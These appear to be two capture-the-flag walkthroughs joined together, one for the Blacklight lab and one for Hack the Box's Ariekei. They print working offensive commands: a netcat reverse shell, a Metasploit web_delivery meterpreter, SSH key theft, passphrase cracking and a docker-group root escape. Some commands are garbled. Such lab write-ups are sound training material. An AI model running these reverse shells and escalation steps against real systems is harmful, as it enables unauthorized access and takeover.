Hacking the Blacklight: 1 (CTF Challenge)

Hello everyone. In this article we’ll be hacking a new lab Blacklight. The motto of the lab is to capture 2 flags. It is made by Carter B (downloadable from here) and after a lot of brainstorming, we are presenting before you a really efficient method to get root and capture the flags.

Steps involved:
1.      Network discovery and port scan
2.      Directory busting the server
3.      Accessing robots.txt on the webpage
4.      Capturing flag 1 from robots.txt and discovery of a new port 9072
5.      Connection to port 9072 to upload a netcat reverse shell
6.      Getting root access and capturing second flag
Let’s get started then.
First and foremost, we’ll discover the IP address of the lab. In my case, the IP is

Let’s scan all the open ports with the most popular tool nmap. A simple nmap might show less ports open so we try the all ports scan:
nmap -p-  -A  - -open

We discovered that port 80 is open. So there must be a webpage associated with it. Let’s move towards our browser and check the website.

There seems nothing interesting here! But wait… maybe there are some directories that could have something valuable for us.
Let’s do a directory buster scan over the IP then.

We observed that robots.txt is available here. It surely would have some information or some directories that could be beneficial. Let’s go over to our browser and access this.

Boom! There it is! Our very first flag. Let’s see what’s in there.

We have got a hash as flag1. But the next flag is unknown. But wait, the second line of this file says 9072! So, it has something to do with 9072 port and “the secret is at home” means only one thing—the next flag is at home. But to access home, we’ll have to be rooted.
There is another dictionary file present here but the current use of it is unknown.
Holding that thought, let’s go ahead and try connecting to port 9072 with telnet.

Hey! We successfully connected to a console but there is a boundation provided by the author here. We cannot execute more than 2 commands in this console! As soon as we hit 2 commands the server will quit and the listener won’t accept a connection again.
So, first command that we type is .help, it will show us a list of things that we can do:
The obvious choice was .readhash but here is another fish! It is of no use! Just like the dictionary provided in robots.txt was of no use!
Now, we’ll try and upload a reverse netcat shell over the command line interface using msfvenom:
msfvenom –p cmd/unix/reverse_netcat lhost= lport=4444 R

Copy the raw code provided (mkfinfo /tmp/cdbe; nc 4444 0
tmp/cdbe 2>&1; rm /tmp/cdbe)
We’ll paste this code in the blacklight console using .exec command:
.exec mkfinfo /tmp/cdbe; nc 4444 0
tmp/cdbe 2>&1; rm /tmp/cdbe

The unique thing about this console is that the output of any command will never be shown. It all will happen in background and then you’ll have to manually dump it. But let’s not go there as there is no need.
Side by side, let’s set up a netcat listener over port 4444 for the payload we just inserted.

Told us we are in root.
But this is not a proper shell. Let us spawn a pty shell using the python command:
python –c ‘import pty;pty.spawn(“/bin/bash”)’
And we have a proper shell now!
Remember what flag1.txt told us? The secret is at home!
cd home
cd blacklight

We found a text file called hash.txt!
cat hash.txt

We examined the home directory one more time. We found a directory called secret! Remember when flag1.txt told us that the secret is in home? Lets check what is inside the .secret directory.
We obtained an image file called "flag2-inside.jpg" 

cd /home
cd blacklight
ls -la
cd .secret

It is obvious from the name of the file that the flag is inside this image. So, lets copy it inside the /var/www/html directory.

cp flag2-inside.jpjg /var/www/html

Let us run this on the web page now! 
Hmmmm... Why are these two words capitalized? 
Wait! There is a tool called OUTGUESS!

Let's download this image on the Desktop and use outguess to copy the flag hidden in a file called flag2.txt

./outguess -r /root/Desktop/flag2-inside.jpg -t flag2.txt
cat flag2.txt

Finally! We obtained the second flag! Happy Hacking!

Hack the Box Challenge: Ariekei Walkthrough

Hello friends! Today we are going to solve another CTF challenge “Ariekei” which is available online for those who want to increase their skill in penetration testing and black box testing. Ariekei is retired vulnerable lab presented by Hack the Box for making online penetration practices according to your experience level; they have the collection of vulnerable labs as challenges from beginners to Expert level.
Level: Expert
Task: find user.txt and root.txt file on victim’s machine.
Since these labs are online available therefore they have static IP and IP of sense is so let’s begin with nmap port enumeration.
nmap -sV -p- –open
From given below image, you can observe we found port 22, 443 and 1022 are open on target system.

Now when we open the website we get a webpage that has a message on it saying it was maintenance.

Now we add the two domain names we found in the SSL certificate in /etc/hosts file for further enumeration.

When we open “calvin.ariekei.htb” we get an error message saying the requested url is not found.

Now when we open “beehive.ariekei.htb” we get the same under maintenance page as we did the first time we opened the target’s IP address in our browser.

The dirb scan shows that we access /cgi-bin/stats directory on the target server, so we open the link provided by the dirb scan. We find that it is running some shell script which might be vulnerable to shellshock vulnerability.

dirb https://calvin.ariekei.htb/

Dirb scan shows us a directory named “upload/”, we open the link and find an upload page.

This page looks like it converts one type of image into another. This application maybe vulnerable to ImageTragick vulnerability. So we create a mvg file to get reverse shell.

Now we upload the file on the server using the upload page we found.

We setup our listener using netcat, as soon as we upload the file we get our reverse shell.

We take a look at /proc/1/cgroup and find that we are inside a docker container.

Now we take a look at the mounted files, and find a directory called /common.

We open the “common/” directory and find a secret directory called “.secrets/”. We take a look inside the content of the directory and find files named “bastion_key” and “bastion_key.pub”.

We open the “bastion_key” and we find a RSA key.

We copy the file into our system and save it as id_rsa, so that we can use it to login using ssh.

We change the permissions of the key, and login through ssh as root user using the RSA key.
chmod 600 id_rsa
ssh root@ -p 1022 -i id_rsa

We again go to the “common/” directory, inside /containers/blog-test/ we find a few files and directories. One of the file contained a few bash commands and also root user password.

Now during our dirb scan we found a directory called /cgi-bin/stats/ which could be vulnerable to shellshock but we were unable to exploit it because of the web application firewall. As the waf-live is routing traffic between us and blog-test on port 443 it is possible to exploit the shellshock vulnerability from inside the server.

We know the target ip to be form the configuration file. We now need to find the IP address to docker system we are in.

We use the shellshock exploit from here, and we got a reverse shell of the machine.

The shell we got was not stable, so we use web_delivery module of the metasploit-framework to get a stable reverse shell.
msf > use multi/script/web_delivery
msf exploit(multi/script/web_delivery) > set payload python/meterpreter/reverse_tcp
msf exploit(multi/script/web_delivery) > set lhost
msf exploit(multi/script/web_delivery) > set lport 4444
msf exploit(multi/script/web_delivery) > run

We copy the command that was given in by the web_delivery script and pasted it in our unstable shell and we got our stable reverse shell.

Now we spawn a TTY shell and use the password we found earlier in the Dockerfile to login as root.

When we try to login through ssh using this key, we are asked for a passphrase. So we use john the ripper to crack the passphrase. We use the default wordlist of johntheripper and find the passphrase to be “purple1”.
ssh2jon key.txt > hash_key.txt
john hash_key.txt

After we get the passphrase we change the permission of RSA key file and login as user spanishdancer as it was inside the spanishdancer’s home directory.
chmod 600 key.txt
ssh -i key.txt spanishdancer@

Now when we run the id command we find that we are a member of docker group. Some containers have a dedicated group to allow unprivileged users to manage their containers without having to escalate their privileges.

To exploit this vulnerability, we first need to check the docker images that are available.
docker images

docker run -v /:/hack -i -t bash